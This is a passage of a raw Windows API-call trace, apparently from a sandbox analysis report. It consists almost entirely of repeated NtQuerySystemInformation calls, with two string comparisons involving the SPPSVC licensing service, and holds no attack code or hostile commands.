SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0238.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0238.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0238.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0238.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0238.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0238.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0238.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0238.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0238.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0238.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0238.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0238.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0238.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0238.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0238.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0238.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0238.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0238.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0238.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0238.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0238.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0238.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0238.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0238.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0238.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0238.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0238.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0238.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0238.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0238.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0238.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0238.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0238.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0238.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0238.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0238.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0238.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x28, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0238.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0238.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0238.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0238.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0238.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0238.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0238.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.761] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0238.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0238.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0238.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0238.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0238.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0238.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0238.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.806] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.810] NtQuerySystemInformation (SystemInformationClass=0xb9, 